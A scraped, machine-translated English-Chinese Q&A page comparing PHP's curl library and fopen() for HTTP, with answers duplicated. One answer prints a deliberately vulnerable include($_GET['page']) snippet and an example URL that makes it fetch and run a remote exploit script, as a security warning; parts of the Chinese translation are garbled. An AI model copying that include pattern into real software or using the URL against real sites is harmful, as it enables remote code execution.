I'm writing some code that will need to speak to a web service over HTTP(s). In the past I've used the curl library. Recently, I noticed that I can simply use fopen() to access a remote URL and it seems far simpler.
我正在编写一些需要通过HTTP与web服务对话的代码。过去我用过curl库。最近,我注意到我可以简单地使用fopen()来访问远程URL,而且看起来要简单得多。
Curl seems to be much more configurable, having a plethora of options. Beyond that configurability, does it matter which method is used? If so, which is better and why?
Curl似乎更易于配置,有大量的选项。除了可配置性,使用哪种方法有关系吗?如果是这样,哪一个更好,为什么?
3 个解决方案
#1
14
fopen() will only open remote URLs if allow_fopen_url is enabled in php.ini.
如果在php.ini中启用了allow_fopen_url, fopen()将只打开远程url。
However in versions prior to 5.2.0, this was exceedingly dangerous because the include function would also download and parse PHP code from remote sites. A naive coder could easily be caught out with code like:
但是在5.2.0之前的版本中,这是非常危险的,因为include函数还会从远程站点下载和解析PHP代码。一个幼稚的编码器很容易被以下代码捕获:
<?php
$page = $_GET['page'];
include($page);
?>
at which point an attacker just has to ask for http://example.com/script.php?page=http://example.net/my_exploit_script to execute their own code on the system and introduce an exploit. Unfortunately the default value for allow_fopen_url is 'on'.
此时,攻击者只需请求http://example.com/script.php?page=http:// / example.net/my_剥削者脚本在系统上执行他们自己的代码并引入一个漏洞。不幸的是,allow_fopen_url的默认值是“on”。
Fortunately, since 5.2.0 there's a separate setting (which should default to 'off') called allow_url_include which prevents include from downloading remote code.
幸运的是,自从5.2.0以来,有一个名为allow_url_include的单独设置(应该默认为'off')阻止include下载远程代码。
Personally, if you've got the option to use Curl, use that rather than fopen.
就我个人而言,如果您可以选择使用Curl,那么使用它而不是fopen。
#2
15
As Alnitak said, using CURL does not depend on the PHP settings. I've done some speed tests
正如Alnitak所说,使用CURL并不依赖于PHP设置。我做了一些速度测试
file_get_contents
with my
和我的
function file_get_contents_curl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
Result:
结果:
0.263456821442
0.0626730918884
CURL is 4 times faster :)
卷发要快4倍:)
#3
5
side note: PHP can be configured to use curl for the http url_wrapper instead of using "its own" implementation.
附加说明:PHP可以配置为将curl用于http url_wrapper而不是使用“它自己的”实现。
ext/curl/interface.c:
ext /卷/ interface.c:
#ifdef PHP_CURL_URL_WRAPPERS
# if HAVE_CURL_VERSION_INFO
{
curl_version_info_data *info = curl_version_info(CURLVERSION_NOW);
char **p = (char **)info->protocols;
while (*p != NULL) {
php_register_url_stream_wrapper(*p++, &php_curl_wrapper TSRMLS_CC);
}
}
# else
php_register_url_stream_wrapper("http", &php_curl_wrapper TSRMLS_CC);
php_register_url_stream_wrapper("https", &php_curl_wrapper TSRMLS_CC);
php_register_url_stream_wrapper("ftp", &php_curl_wrapper TSRMLS_CC);
php_register_url_stream_wrapper("ldap", &php_curl_wrapper TSRMLS_CC);
# endif
#endif
#1
14
fopen() will only open remote URLs if allow_fopen_url is enabled in php.ini.
如果在php.ini中启用了allow_fopen_url, fopen()将只打开远程url。
However in versions prior to 5.2.0, this was exceedingly dangerous because the include function would also download and parse PHP code from remote sites. A naive coder could easily be caught out with code like:
但是在5.2.0之前的版本中,这是非常危险的,因为include函数还会从远程站点下载和解析PHP代码。一个幼稚的编码器很容易被以下代码捕获:
<?php
$page = $_GET['page'];
include($page);
?>
at which point an attacker just has to ask for http://example.com/script.php?page=http://example.net/my_exploit_script to execute their own code on the system and introduce an exploit. Unfortunately the default value for allow_fopen_url is 'on'.
此时,攻击者只需请求http://example.com/script.php?page=http:// / example.net/my_剥削者脚本在系统上执行他们自己的代码并引入一个漏洞。不幸的是,allow_fopen_url的默认值是“on”。
Fortunately, since 5.2.0 there's a separate setting (which should default to 'off') called allow_url_include which prevents include from downloading remote code.
幸运的是,自从5.2.0以来,有一个名为allow_url_include的单独设置(应该默认为'off')阻止include下载远程代码。
Personally, if you've got the option to use Curl, use that rather than fopen.
就我个人而言,如果您可以选择使用Curl,那么使用它而不是fopen。
#2
15
As Alnitak said, using CURL does not depend on the PHP settings. I've done some speed tests
正如Alnitak所说,使用CURL并不依赖于PHP设置。我做了一些速度测试
file_get_contents
with my
和我的
function file_get_contents_curl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
Result:
结果:
0.263456821442
0.0626730918884
CURL is 4 times faster :)
卷发要快4倍:)
#3
5
side note: PHP can be configured to use curl for the http url_wrapper instead of using "its own" implementation.
附加说明:PHP可以配置为将curl用于http url_wrapper而不是使用“它自己的”实现。
ext/curl/interface.c:
ext /卷/ interface.c:
#ifdef PHP_CURL_URL_WRAPPERS
# if HAVE_CURL_VERSION_INFO
{
curl_version_info_data *info = curl_version_info(CURLVERSION_NOW);
char **p = (char **)info->protocols;
while (*p != NULL) {
php_register_url_stream_wrapper(*p++, &php_curl_wrapper TSRMLS_CC);
}
}
# else
php_register_url_stream_wrapper("http", &php_curl_wrapper TSRMLS_CC);
php_register_url_stream_wrapper("https", &php_curl_wrapper TSRMLS_CC);
php_register_url_stream_wrapper("ftp", &php_curl_wrapper TSRMLS_CC);
php_register_url_stream_wrapper("ldap", &php_curl_wrapper TSRMLS_CC);
# endif
#endif